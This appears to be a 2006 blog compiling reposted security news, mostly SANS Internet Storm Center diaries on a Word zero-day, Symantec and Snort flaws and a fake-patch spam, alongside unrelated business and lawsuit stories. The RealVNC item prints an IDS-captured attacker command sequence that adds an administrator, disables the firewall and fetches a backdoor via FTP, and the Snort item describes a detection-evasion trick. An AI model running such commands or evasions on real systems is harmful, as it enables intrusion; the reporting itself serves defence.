Snort bypass vulnerability (NEW)

Published: 2006-05-31,
Last Updated: 2006-05-31 19:21:02 UTC by Jason Lam (Version: 1)

Demarc just released a vulnerability alert on Snort. The vulnerability leads to evasion of URI content rules. When a carriage return is added to the end of a URL (before HTTP protocol declaration), Snort detection can be evaded. According to the alert, this vulnerability will affect thousands of detection rules in the standard rule base. Thanks to Ben McDougall for reporting this to us.

Please refer to the vulnerability alert for more details,
http://www.demarc.com/support/downloads/patch_20060531

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Windows Live OneCare available now Posted by woody on 31 May 2006 - 07:19:05 Windows Patches/Security

Tell me if this burns you up. Microsoft just announced that the long-anticipated anti-virus/anti-everything service, Windows Live OneCare is now available for purchase. It's, uh, Live. The very first item on OneCare's main page? The Word 0day security hole I wrote about almost two weeks ago. Microsoft calls it "Exploit:Win32/Wordjmp" and identifies it as a "moderate" risk. So let me see if I understand this. Microsoft doesn't have the security patch for this particular hole ready. They may or may not release the patch on June's Patch Tuesday. But Microsoft will sell you protection, if you buy Windows Live OneCare, today. As John Dvorak wrote in his PC Mag column last October: Does Microsoft think it is going to get away with charging real money for any sort of add-on, service, or new product that protects clients against flaws in its own operating system? Does the existence of this not constitute an incredible conflict of interest? Why improve the base code when you can sell "protection"? Is Frank Nitti the new CEO? 'Tis a crazy world we live in....

Woody’s no-bull news, tips and help for Windows and Office..

More on Symantec vulnerabilities (NEW)

Published: 2006-05-31,
Last Updated: 2006-05-31 01:21:02 UTC by Bojan Zdrnja (Version: 1)

The latest patches from Symantec are causing quite a bit of confusion. To reiterate again what Kevin wrote in his diary (http://isc.sans.org/diary.php?storyid=1368):

*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.

Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):

Symantec Antivirus Corporate Edition
10.1.0.394 -> 10.1.0.396 (there's a typo here on their web, it's not version 3)
10.1.0.400 -> 10.1.0.401
10.0.2.2010 -> 10.0.2.2011
10.0.2.2020 -> 10.0.2.2021

Symantec Client Security
3.1.0.394 -> 3.1.0.396
3.1.0.400 -> 3.1.0.401
3.0.2.2010 -> 3.0.2.2011
3.0.2.2020 -> 3.0.2.2021

Now, if you are running *ANY* other version that is affected, you will have to first upgrade to one of the versions that have the patch out and then install the patch. I hope this will clear the confusion.

There seem to be some mitigations to the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, will have the service Rtvscan.exe listening on TCP port 2967. In case that your host based firewall is configured to block access to this port (effectively meaning that you can't manage the client from the centralized server, at least not until the client connects to it) you should be ok.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners so it looks like it's safe, at least from a remote exploit over the network (patch in any case!).

If we get more information we'll update the diary. Thanks to Gary for help with this.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Symantec AV Vulnerability Latest

Published: 2006-05-29,
Last Updated: 2006-05-29 21:21:41 UTC by Kevin Liston (Version: 2(click to highlight changes))

Symantec has updated their advisory (http://www.symantec.com/avcenter/security/Content/2006.05.25.html)

They confirm that the following versions are affected:
Symantec Client Security-
   3.0 all builds
   3.1 all builds
Symantec Antivirus Corporate Edition-
   10.0 all builds
   10.1 all builds

The following patches are available:
Symantec Client Security-
   3.0 Builds 3.0.2.2010 and 3.0.2.2020
   3.1 Builds 3.1.0.394 and 3.1.0.400

Symantec Antivirus Corporate Edition-
   10.0 Builds 10.0.2.2010 and 10.0.2.2020
   10.1 Builds 10.1.0.394 and 10.1.0.400

Symantec recommends that you upgrade to a "patchable" version.  This may be bad news for some organizations.

Some have reported that the patching process is not trivial, and can be difficult to roll out in some environments.

At this time, there have been no reports of proof-of-concept-code or exploit code other than that held privately by eEye.

We have not received any reports of exploitation in the wild.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Link to 'a new Microsoft patch' being spammed (NEW)

Published: 2006-05-30,
Last Updated: 2006-05-30 02:19:26 UTC by Bojan Zdrnja (Version: 1)

We've received samples of an e-mail which is being actively spammed at the moment. The e-mail purports to be from Microsoft and it is notifying the recipient of "a new vulnerability [that] has been discovered in the Microsoft WinLogon Service". It further states that the vulnerability can allow an attacker access to the unpatched system.

Of course, the user is advised to install the patch which can be downloaded from the included link.

As the e-mail body is an HTML message, the displayed link (http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe) is not where the user will really be sent:

http:// www.redcallao.com/ [REMOVED] / winlogon_patchV1.12.exe

At the time when this diary was written, the site was still up and serving malware. AV detection although a better then first time when we tried it, is still pretty bad. Only 8 products from VirusTotal detected this:

AntiVir     6.34.1.34   05.29.2006    Heuristic/Crypted.Modified
BitDefender 7.2         05.30.2006    Trojan.BeastPWS.C
Kaspersky   4.0.2.24    05.30.2006    Trojan-Spy.Win32.Delf.jq
NOD32v2     1.1566      05.30.2006    Win32/Spy.Delf.NBR
Panda       9.0.0.4     05.29.2006    Suspicious file
Sophos      4.05.0      05.30.2006    Troj/BeastPWS-C
Symantec    8.0         05.30.2006    Infostealer

Does all this sound familiar? Sure, it's (almost) the same story that the Swen worm (or Gibe.F) tried to "sell" to the users. Hopefully this one will not come close to doing what Swen did.
.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

http://www.symantec.com/avcenter/venc/data/w32.mytob@mm.removal.tool.html

Cogent Routing Outages (NEW)

Published: 2006-05-24,
Last Updated: 2006-05-24 11:55:40 UTC by Johannes Ullrich (Version: 2(click to highlight changes))

This morning (shortly after 9am UTC, 5am EDT), Cogent experienced an outage resulting in many sites being not reachable. Things are slowly coming back together. Some sites may still not yet be reachable.

Keynote shows issues between Cogent and almost all of its peers, as well as some isolated issued with Savvis.
http://scoreboard.keynote.com/scoreboard/Main.aspx?Login=Y&Username=public&Password=public

Note: Cogent's URL is 'cogentco.com', NOT 'cogent.com'.

Screen shot from Keynote as of 07:50 EDT (11:50 UTC):

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

 

Halliburton, Bechtel could be factors in border security plan

By Mike Sunnucks

The Business Journal of Phoenix

Updated: 7:00 p.m. ET May 21, 2006

Two big and controversial corporate names -- Halliburton and Bechtel -- could benefit from mammoth increases in federal spending on border security.

Federal and state efforts to bolster porous border security include plans for increased security infrastructure, expanded use of technology, including radar. Other plans include construction of more prison beds, and additional law enforcement operations, security roads and improved employment verification systems and ports of entry.

That will mean billions of dollars in border-related contract opportunities for defense, technology and other government contractors. A substantial number of border security contracts are expected to go to major contractors -- including big infrastructure, construction and contract management experts such as Halliburton Co. and Bechtel Corp.

"It's the big boys that will benefit from this," said Congressman Ed Pastor, a Phoenix Democrat. "Most of the big contracts are going to go out to the Halliburtons and Bechtels."

Those two companies are well-known for being politically connected and have received top infrastructure, energy and construction management contracts in Iraq. They also have critics who worry about their political ties to the Bush administration and Washington, D.C., power brokers.

Houston-based Halliburton formerly was headed by Vice President *** Cheney, and its subsidiary KBR (Kellogg Brown & Root) constructed the post-9/11 terrorist jail cells at the U.S. Naval Base at Guantanamo Bay, Cuba. KBR already won one contract to build more prison facilities to help with border enforcement.

Those two companies specialize in large infrastructure and construction-related contracts. Various border security plans call for construction of security fences and walls, new roads and equipment for the resource-challenged U.S. Border Patrol, technology surveillance applications and more law enforcement offices, checkpoints and jail cells to house illegal migrants caught crossing the border as well as drug traffickers and other smugglers.

Pastor said large contractors often get awarded comprehensive federal contracts when there is a rush to get quick movement on a matter. Those contractors then can dole out subcontracts to specialty firms and subcontractors.

Halliburton, Bechtel could be factors in border security plan - Top Stories - MSNBC.com.

Update on Word 0-Day Issue (NEW)

Published: 2006-05-23,
Last Updated: 2006-05-23 12:19:28 UTC by David Goldsmith (Version: 1)

Microsoft and eEye have each released advisories related to the issue this evening.

Microsoft's security advisory can be found here.

eEye's advisory can be found here.

The information about vulnerable exploits differs a little between the two advisories.

Microsoft says the vulnerability only affects Word 2002/XP and Word 2003 and that Word 2000 is not vulnerable. The Microsoft advisory contains information on workarounds including not using Word as the default mail editor in Outlook and running Word in 'Safe Mode' to disable the functionality that is affected by the vulnerability and exploit.

eEye says that the vulnerability affects Word 2000 as well.  The eEye advisory mentions that they believe there are two variants of this exploit.  Thus, it may be that the first variant only affects Word 2002/XP and 2003 and the second variant affects all three versions.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Targeted attack: experience from the trenches

Published: 2006-05-21,
Last Updated: 2006-05-21 18:32:42 UTC by Swa Frantzen (Version: 3(click to highlight changes))

Learn

Learning lessons from incidents is a very important part of incident handling. Yet with targeted attacks it is very hard as you need to have a case before you can learn. So learning from others is even more important in this case.

Michael reported on an unnamed organization being hit by a limited, extremely targeted attack.

Detection is mostly the very hard part in these attacks. This case seems to have been detected by a very alert user detecting a domainname in an email that wasn't completely right.

That user detected an email coming in that originated from a domain that looked like their own, but wasn't their own (actually only had an MX record in it). The email was written to look like an internal email, including signature. It was addressed by name to the intended victim and not detected by the anti-virus software.

FUD ?

In reaction to this reporting we've seen people react to it like it were a widespread thing. We need to stress this is not the case. This kind of attack is new, and so must the response be.

The group originating these attacks does so in a very targeted fashion. The document is crafted to target a specific organization, containing specific elements that deal with just that one organization. If you don't work for them, you are very unlikely to ever see this. Proof of how rare it is, are the number of requests for samples we got from companies like anti-virus vendors.

Chances are really huge you're not targeted, at least not by this exploit. There is so far one group doing (at least) one very targeted attacks with this. Either they need to change their method of operation to do widespread attacks, or some other group would need to get a sample, reverse engineer it, find the core of the exploit, modify it to work in a wider fashion and launch a new attack.

So do you need to dig in now? Most likely not, we suggest you act as if it's any new vulnerability where the details are still very well hidden.

• The one being targeted organization needs specific actions.
  
• If you are on the potential target list, you need to learn to defend against the unknown, not against this threat.
  
• If you're not on their target list, chances are you will not see an exploit till Microsoft releases a patch and the knowledge to exploit it can be derived by the hackers.

Panic and blindly taking actions is probably the worst course of action you can take.

Report

To say it in Michael's words:

"Emails were sent to specific individuals within the organization that contained a Microsoft Word attachment. This attachment, when opened, exploited a previously-unknown vulnerability in Microsoft Word (verified against a fully-patched system).  The exploit functioned as a dropper, extracting a trojan byte-for-byte from the host file when executed.  After extracting and launching the trojan, the exploit then overwrote the original Word document with a "clean" (not infected) copy from payload in the original infected document.  As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file.  If the user agrees, the new "clean" file is opened without incident." They are working with Microsoft on this.

"We are still analyzing the trojan dropped by the exploit.  What we do know is that it communicates back to localhosts[dot]3322[dot]org via HTTP.  It is proxy-aware, and "pings" this server using HTTP POSTs of 0 bytes (no data actually POSTed) with a periodicity of approximately one minute.  It has rootkit-like functionality, hiding binary files associated with the exploit (all files on the system named winguis.dll will not be shown in Explorer, etc.), and invokes itself automatically by including the trojan binary in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows".  Note that, as of this morning, no anti-virus signatures detected this file as problematic according to virustotal.com.

We have traced nearly this attack to the far east; specifically, China and Taiwan.  IP's seen are registered there, domains seen are registered there, and the emails received originated from a server in that region.  The attackers appear to be aware that they have been "outed", and have been routinely changing the IP address associated with the URL above.

Due to the aggravating circumstances (0-day, no AV detection), we wanted to make sure the community is aware that this problem exists as soon as possible."

More information:

• Analysis and vendor information
• Defenses
• Summary

Many thanks to all handlers active on this: Johannes, Chris, William, Adrien.

--
Swa Frantzen - Section 66

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

3322, 8866 and others	Posted by Mikko @ 21:02 GMT

There's been quite a lot of buzz about the new 0-day Word vulnerability.

While talking about details of the vulnerability, it's easy to forget what the vulnerability was actually used for.

According to the information we have, a US-based company was targeted with emails that were sent to the company from the outside but were spoofed to look like internal emails.

The emails contained a Word DOC file as an attachment. DOCs are a nasty attack vector. Few years ago, when macro viruses were the number one problem, many companies were not allowing native DOC files through their email gateways. Now that has changed, and DOCs typically get through just fine. But Word has vulnerabilities and users typically don't install Word patches nearly as well Windows patches.

When run, the exploit file ran a backdoor, hid it with a rootkit and allowed unrestricted access to the machine for the attackers, operating from a host registered under the Chinese 3322.org domain.

3322.org is a free host bouncing service in China. Anybody can register any host name under 3322.org (like whatever.3322.org) and the service will point that hostname to any IP address you want. There's actually a series of such services, including 8866.org, 2288.org, 6600.org, 7700.org, 8800.org and 9966.org. There are tons of useful things you can do with such host-resolving service. And tons of bad things too.

Now, we've seen these kinds of attack before.

In March 2005, somebody was sending out dozens of emails to US government email addresses, spoofed to be from Washington Post. The email content talked about "international IPR conventions China has acceded to". The attached DOC file dropped a backdoor that connected to a host under 8866.org.

In September 2005, somebody sent several batches of EU-themed emails to addresses at the EU Parliament. Email topics included "Parliamentary Assembly", "Assembly of Council of Europe" and "Parliamentary Assembly Declaration". Emails contained a DOC that connected to a host under 3322.org.

In March 2006, a big European company received emails that were spoofed to look like internal job applications. The attached DOC file dropped a backdoor that connected to a host under 3322.org.

In April 2006, another European company was targeted by a similar attack, this time connecting to a host under 8866.org.

And now in May 2006, this latest case complete with a zero-day exploit, connecting to a host under 3322.org.

So, should you block access to hosts under 3322.org, 8866.org and others? Depends. It's kind of like blocking access to Geocities: you'd block lots of bad stuff - and lots of good stuff. But then again, most users of these services are in China. If you're not in China and your users are not supposed to access different Chinese services, blocking might not break too many things.

We'd recommend you'd at least check your company's gateway logs to see what kind of traffic you have to such services.

F-Secure : News from the Lab - May of 2006.

A quick check-in on the Word vulnerability

Hi everyone, Stephen Toulouse here again.  I wanted to catch you up on where we’re at with our investigation of the Word vulnerability. 

 

First off on the vulnerability itself: I want to reiterate we’re hard at work on an update.  The attack vector here is Word documents attached to an email or otherwise delivered to a user’s computer.  The user would have to open it first for anything to happen.  That information isn’t meant to say the issue isn’t serious, it’s just meant to clearly denote the scope of the threat.

 

Now, we’ve received singular reports of attacks and have been working directly with the couple of customers thus far affected.  In analyzing the malware we’ve added detection to the Windows Live Safety Center, and we’ve passed all that information over to our antivirus partners.  But in breaking down the current malware we discovered some commonality to the current attack.  The attack we’ve seen is email based.  The emails tend to arrive in groups, they often have fake domains that are similar to real domains of the targets, but the targets are valid email addresses. 

 

Currently two of the subject lines we have seen are: 

 

Notice

RE Plan for final agreement

 

The attack we have seen so far requires admin rights, so limitations on user accounts can help here.  I want to repeat that customers who believe they are affected can contact Product Support Services.  You can contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location:

http://support.microsoft.com/security.

 

So far, this is a *very* limited attack, and most of our antivirus partners are rating this as “low”.  But we’re working to investigate any variants we might see to make sure detection is out there, as well as working on the update to address the vulnerability.

 

S. 

 

PS: Michael Howard recently wrote a great article for not running as admin.  It can be found here:  http://msdn.microsoft.com/security/securecode/columns/default.aspx?pull=/library/en-us/dncode/html/secure01182005.asp

 

*This posting is provided "AS IS" with no warranties, and confers no rights.*

Published Saturday, May 20, 2006 9:03 PM by stepto

Welcome to the Microsoft Security Response Center Blog! : A quick check-in on the Word vulnerability.

Microsoft Word Vulnerability (NEW)

Published: 2006-05-20,
Last Updated: 2006-05-21 02:05:23 UTC by Koon Tan (Version: 1)

Most anti-virus vendors have already come out with signatures to detect the malware exploiting MS Word vulnerability. By now, I hope you have got all your AV signatures updated. Although relying on virus scanner is not totally full proof (especially on new variants), but it is better than none (remember defense-in-depth).

At your firewall and IDS, you may want to monitor outbound traffic going to these domains, as this may be an indication of compromised hosts:

3322.org
scfzf.xicp.net

If you are filtering Word attachment at your gateway, it should be based on Word file type and not just on file extension alone.

US CERT has released an security alert on Microsoft Word Vulnerability

Below are stories from ISC on this topic. We will update as we have more detailed information.

Word 0-day, recommended defenses

Targeted attack: Word exploit
- More AV vendor links have been added.

Targeted attack: experience from the trenches

(Update)
Miscrosoft has put up a new article on A quick check-in on the Word vulnerability (Thanks Juha-Matti). Part of the article is extracted below:

First off on the vulnerability itself: I want to reiterate we're hard at work on an update.  The attack vector here is Word documents attached to an email or otherwise delivered to a user's computer.  The user would have to open it first for anything to happen.  That information isn't meant to say the issue isn't serious, it's just meant to clearly denote the scope of the threat.

Now, we've received singular reports of attacks and have been working directly with the couple of customers thus far affected.  In analyzing the malware we've added detection to the Windows Live Safety Center, and we've passed all that information over to our antivirus partners.  But in breaking down the current malware we discovered some commonality to the current attack.  The attack we've seen is email based.  The emails tend to arrive in groups, they often have fake domains that are similar to real domains of the targets, but the targets are valid email addresses. 

Currently two of the subject lines we have seen are: 

Notice
RE Plan for final agreement

The attack we have seen so far requires admin rights, so limitations on user accounts can help here.  I want to repeat that customers who believe they are affected can contact Product Support Services.  You can contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location:

http://support.microsoft.com/security.

So far, this is a *very* limited attack, and most of our antivirus partners are rating this as "low".  But we're working to investigate any variants we might see to make sure detection is out there, as well as working on the update to address the vulnerability.

 

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Well I was finally able to get enough of my comic blog database up and running (with no help from my OLD webhost I might add) from backup to be able to recreate most of what is there.  It should look pretty much identical to what it did before it went down five days ago.

You can check it out at its new location: http://www.talesfromthelongbox.com/

Word 0-day, recommended defenses. (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 22:04:19 UTC by Johannes Ullrich (Version: 1)

The diary about the targeted attacks using a zero-day exploit against Word triggered a lot of questions about how to defend against such an attack. We understand that many organizations can not do without Word documents, so here a few ideas on how to defend against these attacks.

Note that this is not a temporary situation that will blow over soon. Microsoft will release a patch against this problem in June, but even after that there are likely to be other attacks using other exploits. So let's think a bit beyond the next couple of days on how to defend your network.

• User education is of course key, but likely insufficient. Attacks like that will use very plausible messages. Create some examples to re-emphasize this fact. "What if you receive a message from a customer you know, referencing a project you are working on, that includes a Word document". Teach users to double check out of band. "Do not open the document before calling the customer".
• Do not trust Antivirus alone. Defending against 0-day is all about defense in depth. Antivirus is likely going to fail you for an exploit like that. Consider a system that quarantines attachments for at least 6-12 hours to allow anti virus signatures to catch up. This may not be acceptable for a lot of organizations, but in particular right now, with a known exploit, it may be a reasonable step.
• Limit users' privileges. The particular sample we received will not run as a non-administrator user. It will be MUCH easier to clean up after an exploit like that if the user had no administrator rights.
• Monitor outbound traffic. Your IDS and your firewall are as valuable to protect your network from malicious traffic entering as they are in protecting you against your corporate secrets leaving your network. Consider deploying "honey tokens", files with interesting names that contain a particular signature your IDS will detect.
• Block outbound traffic. Try to limit sites accessible to users and use techniques like proxy servers to isolate your clients further. Proxy filter logs will also work great as an IDS to detect suspect traffic.
• Limit data on desktops. Try to teach users to limit data they store "in reach". This is a difficult balance. But a file on a remote system, which would require additional authentication, will likely not be accessible by a bot as in this case. Locally encrypted files will work too (as long as they stay encrypted until used). Encrypted file systems will not help as they will be accessible to the user opening the word document.

Again. None of these techniques are perfect. Each one can be circumvented. But the more layers you can wrap your users in the better. Think what will work well in your organization. Personal firewalls on desktop? Traffic control with flowtools or ntop? What are the tools you already have that can be used for this purpose.

There are also some rather more radical "solutions" possible if you absolutely need to be sure that you can continue working independently of this 0-day (and the inevitable variants to follow soon):

• consider additional filtering, for example using software which converts Word DOC format to something which cannot carry the virus, e.g. RTF.  Consider using the free wvWare library. You will lose formatting but that might be an acceptable bargain for e-mail incoming from outside your organisation.
  

• consider the possibility of disabling Word and replacing it with OpenOffice until Microsoft releases patches.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Targeted attack: Word exploit - Update (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 18:23:37 UTC by Chris Carboni (Version: 1)

In yesterday's diary, Swa reported on a targeted attack that appears to use a previously undiscovered Microsoft Word exploit.

What we know so far is that when the exploit is launched, early on in the process, it drops a bot, possibly Rbot or some variant.

Once the bot is in place, it begins an extensive recon of the system; installed patches, installed AV, contents of My Documents, startup file contents, IE config ..

McAfee detects the Word document with the 4766 definition file as Exploit-OleData.gen and also associates Backdoor-CKB!cfaae1eg with this exploit. (Thanks James!)

File size: 233472 bytes

MD5: c1bb026ec2b42adc17d0efb7bb31f4dc

SHA1: 02b9a9530e0f4edb3bc512707c16390ea5b394d1

Thanks again to Michael for reporting the incident to us and all the handlers who have helped in the ongoing analysis

Thanks to juha-matti for finding a few more references:

Symantec - Dropper component

Symantec - Backdoor component

This one from an anonymous reader

F-Secure

And this just sent from Microsoft Security Response Center

Microsoft is investigating new public reports of a "zero-day" attack using a vulnerability in Microsoft Word XP and Microsoft Word 2003. In order for this attack to be carried out, a user most first open a malicious Word document attached to an e-mail or otherwise provided to them by an attacker.  Microsoft will continue to investigate the public reports to help provide additional guidance for customers as necessary.

As a best practice, users should always exercise extreme caution when opening unsolicited attachments from both known and unknown sources. Microsoft is adding detection to the Windows Live Safety Center today for up-to-date removal of malicious software that attempts to exploit this vulnerability.  The Windows Live Safety Center is located at the following website:

http://safety.live.com <http://safety.live.com>

Microsoft is completing development of a security update for Microsoft Word that addresses this vulnerability.  The security update is now being finalized through testing to ensure quality and application compatibility and is on schedule to be released as part of the June security updates on June 13, 2006, or sooner as warranted.

Customers who believe they are affected can contact Product Support Services.  Contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location: http://support.microsoft.com/security <https://mail.microsoft.com/exchweb/bin/redir.asp?URL=http://support.microsoft.com/security> .

As always, Microsoft encourages customers to follow its "Protect Your PC" guidance of enabling a firewall, applying all security updates and installing anti-virus software. Customers can learn more about these steps at www.microsoft.com/protect <https://mail.microsoft.com/exchweb/bin/redir.asp?URL=http://www.microsoft.com/protect>

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

If you are one of the three or four people that check out my Tales from the Longbox comic book blog, you might have noticed that the site and the rss feed is down right now.

I will be switching hosts soon due to the inability of my current host to keep things up and running and the time it is taking restore things after this last disaster (going on 4 days now, I even had to let THEM know it happend).

Look for more information soon.

Symantec sues Microsoft in contract dispute

All Reuters News

SAN FRANCISCO (Reuters) - Symantec Corp. sued software rival Microsoft Corp. on Thursday, accusing it of misappropriating trade secrets to develop its own competing features and products, including the next version of Windows.

The lawsuit filed in federal court in Seattle charges the world's biggest software maker with misappropriating intellectual property and breach of contract related to a licensing deal with Veritas, which Symantec acquired last year.

It also seeks an injunction that would block the further development, sale or distribution of Vista -- the already- delayed next version of Windows -- and other products until all Symantec intellectual property is removed.

"Microsoft's pervasive and continuing disregard of Symantec's intellectual property and contract rights has irreparably harmed Symantec and constitutes trade secret misappropriation," the complaint said.

Microsoft said in statement it worked hard to try to resolve the dispute and that it acted within its rights in the contract.

"We are confident that our actions are wholly consistent with the legal agreements between Veritas and Microsoft and that these claims will be shown to be without merit," Microsoft said.

The dispute pits two of the biggest consumer software makers against each other and centers on a Symantec product called Volume Manager, which allows operating systems to store and manipulate large amounts of data.

The complaint accuses Microsoft of improperly incorporating the technology into its own operating system products and seeks compensation as well as the removal of the intellectual property from the company's offerings.

.

MSN Money - News.

Symantec Sues Microsoft to Stop Vista

 

Company claims Microsoft is wrongfully using its Veritas storage technology in the next version of Windows.

Robert McMillan, IDG News Service

Friday, May 19, 2006

Symantec has asked a U.S. court to order a halt to the development of Windows Vista, claiming that its rival is wrongfully incorporating Veritas storage technology into its next-generation OS.

Symantec sued Microsoft yesterday, seeking unspecified damages and also asking the court to remove Symantec's storage technology from a variety of Microsoft products, including Windows XP, Windows Server 2003, and the upcoming Vista and "Longhorn" Windows Server products.

"We're asking them to remove the technology, because it belongs to us," a Symantec spokesman said.

The dispute centers around an August 1996 agreement between the two companies that granted Microsoft the right to use Veritas Software's volume management technology in its Windows NT product. Symantec purchased Veritas in a $10.2 billion acquisition that closed last year.

Symantec's Claims

Symantec claims that Microsoft misappropriated its technology and even tricked the U.S. Patent and Trademark Office into granting Microsoft patents based on Symantec intellectual property. The security and storage vendor also says that portions of Microsoft's next-generation Vista and "Longhorn" server OSes are based on this misappropriated software.

Microsoft believes it has every right to use the Veritas technology, the company said in a statement. "These claims are unfounded because Microsoft actually purchased intellectual property rights for all relevant technologies from Veritas in 2004," Microsoft said. "The [1996] contract ultimately gave Microsoft the option to buy out the rights to Veritas? code and intellectual property."

According to Symantec, however, this 1996 contract prevents Microsoft from developing products that compete with the Veritas software. Vista contains a number of competing features, relating to the way Vista manages data that is stored on a number of hard drives, Symantec said.

Microsoft's buy-out was an "ill-conceived effort to whitewash" this breach of the agreement, the court filings state.

The two companies have been working at resolving the dispute since 2004, when Symantec caught wind of the Vista features following an early release of the OS at Microsoft's annual Windows Hardware Engineering Conference.

During that period, Symantec learned that "Microsoft was so bold as to file fraudulent documents with the U.S. government, claiming stake to certain Veritas inventions," the court filings state. The Microsoft patents in question, which relate to storage management, are: No. 6,553,387, No. 6,629,202, No. 6,681,310, No. 6,684,231, and No. 6,735,603.

PCWorld.com - Symantec Sues Microsoft to Stop Vista.

Targeted attack: experience from the trenches (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 09:32:44 UTC by Chris Carboni (Version: 2(click to highlight changes))

Learning lessons from incidents is a very important part of incident handling. Yet with targeted attacks it is very hard as you need to have a case before you can learn. So learning from others is even more important in this case.

Michael reported on an unnamed organization being hit by a limited, targeted attack.

Detection is mostly the very hard part in these attacks. This case seems to have been detected by a very alert user detecting a domainname in an email that wasn't completely right.

That user detected an email coming in that originated from a domain that looked like their own, but wasn't their own (actually only had an MX record in it). The email was written to look like an internal email, including signature. It was addressed by name to the intended victim and not detected by the anti-virus software.
 
To say it in Michael's words:

"Emails were sent to specific individuals within the organization that contained a Microsoft Word attachment. This attachment, when opened, exploited a previously-unknown vulnerability in Microsoft Word (verified against a fully-patched system).  The exploit functioned as a dropper, extracting a trojan byte-for-byte from the host file when executed.  After extracting and launching the trojan, the exploit then overwrote the original Word document with a "clean" (not infected) copy from payload in the original infected document.  As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file.  If the user agrees, the new "clean" file is opened without incident." They are working with Microsoft on this.

"We are still analyzing the trojan dropped by the exploit.  What we do know is that it communicates back to localhosts[dot]3322[dot]org via HTTP.  It is proxy-aware, and "pings" this server using HTTP POSTs of 0 bytes (no data actually POSTed) with a periodicity of approximately one minute.  It has rootkit-like functionality, hiding binary files associated with the exploit (all files on the system named winguis.dll will not be shown in Explorer, etc.), and invokes itself automatically by including the trojan binary in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows".  Note that, as of this morning, no anti-virus signatures detected this file as problematic according to virustotal.com.

We have traced nearly this attack to the far east; specifically, China and Taiwan.  IP's seen are registered there, domains seen are registered there, and the emails received originated from a server in that region.  The attackers appear to be aware that they have been "outed", and have been routinely changing the IP address associated with the URL above.

Due to the aggravating circumstances (0-day, no AV detection), we wanted to make sure the community is aware that this problem exists as soon as possible."

We're having a look at the word document ourselves. So far we found it has aparently embedded excel and powerpoint components and we found a string in Chinese that translates to: "report test file structure information write into stack"

Many thanks to all handlers active on this: Johannes, Chris, William, Adrien.

--
Swa Frantzen - Section 66

Update:

When the exploit is launched, early on in the process, it drops a bot, possibly Rbot or some variant.

Once the bot is in place, it begins an extensive recon of the system; installed patches, installed AV, contents of My Documents, startup file contents, IE config ..

More to follow as information becomes available.

-Chris Carboni

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

RealVNC exploits in the wild (NEW)

Published: 2006-05-19,
Last Updated: 2006-05-19 01:04:16 UTC by Swa Frantzen (Version: 3(click to highlight changes))

Active use of RealVNC to break into systems is being reported anonymously.

If you can share more details or just can report attempts, please let us know.

If you have any RealVNC exposed, check if you are hacked, and if not take measures immediately. If you want an inherently more secure solution check how to run vnc over ssh on your specific platform.

See more of the vulnerability in the May 15th diary by Kyle Haugsness.

[updates below]
List of exploits reported to us by our readers:

• Austin from the UK reports that all shared printers in his office stated to print:

Dear Network Administrator. 

Please do not be alarmed. 
My team is network security specialist. 

You are using a vulnerable version of VNC. 
Please upgrade your version soon.

We have not accessed your data but we could have. 
Have a nice day

The intrusion reportedly happened on a workstation where a visitor left a VNC server running.

He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".

• An Anonymous report about the installation of typical tools installed by the warez and hacker crowd such as Serv-U and pwdump.
  
  
• Mike reported on a machine getting hacked and sent us what his IDS caught of it:

  net user [user] [pass] /ADD
  net localgroup Administrators [user] /ADD
  net stop sharedaccess
  sc delete sharedaccess
  echo open  [port]  > ftptmp
  echo user [ftpuserinfo]  >> ftptmp
  echo get usercontrol.exe  >> ftptmp
  echo get helpservice.svc  >> ftptmp
  echo get JAcheck.ini  >> ftptmp
  echo get JAcheck.dll  >> ftptmp
  echo bye  >> ftptmp
  ftp -n -s:ftptmp
  del ftptmp
  usercontrol /i
  net start "ms system service"

Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. Perhaps more happened earlier, happens later, or just was not caught.

It sure looks like these machines are slowly getting owned one by one ...

--
Swa Frantzen -- Section 66

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Symantec Security Response - W32.Mytob@mm Removal Tool.

This tool is designed to remove infections of the following threats:

• W32.Mytob@mm
• W32.Mytob.B@mm
• W32.Mytob.L@mm
• W32.Mytob.M@mm
• W32.Mytob.R@mm
• W32.Mytob.U@mm
• W32.Mytob.V@mm
• W32.Mytob.AG@mm
• W32.Mytob.AH@mm
• W32.Mytob.AS@mm
• W32.Mytob.BE@mm
• W32.Mytob.BV@mm
• W32.Mytob.CF@mm
• W32.Mytob.CH@mm
• W32.Mytob.CU@mm
• W32.Mytob.CY@mm
• W32.Mytob.DA@mm
